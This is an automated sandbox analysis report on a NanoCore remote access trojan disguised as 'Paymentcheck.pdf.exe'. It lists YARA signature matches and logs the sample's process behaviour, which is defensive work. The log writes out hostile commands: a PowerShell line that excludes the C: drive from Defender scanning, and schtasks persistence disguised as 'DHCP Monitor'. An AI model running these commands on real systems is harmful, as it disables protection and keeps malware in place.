Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORYMatched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORYMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTRMatched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: Paymentcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: msbuildd.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'CreateDecryptor'
Source: 13.2.RegAsm.exe.400000.0.unpack, u0023u003dqVxXNKnhAcArgJoGGYXiyyQu003du003d.csCryptographic APIs: 'TransformFinalBlock'
Source: classification engineClassification label: mal100.troj.evad.winEXE@20/21@0/1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeFile created: C:\Program Files (x86)\DHCP MonitorJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsssJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1088:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2340:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Global\{bcd083ef-bf90-4541-bf76-579f377e7cee}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5584:120:WilError_01
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile created: C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbsJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: Paymentcheck.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeFile read: C:\Users\user\Desktop\Paymentcheck.pdf.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Paymentcheck.pdf.exe 'C:\Users\user\Desktop\Paymentcheck.pdf.exe'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe 0
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe 'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\_Voymjqpmrcebffsjwfsb.vbs'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor' /xml 'C:\Users\user\AppData\Local\Temp\tmp715E.tmp'
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'DHCP Monitor Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp7DD3.tmp'
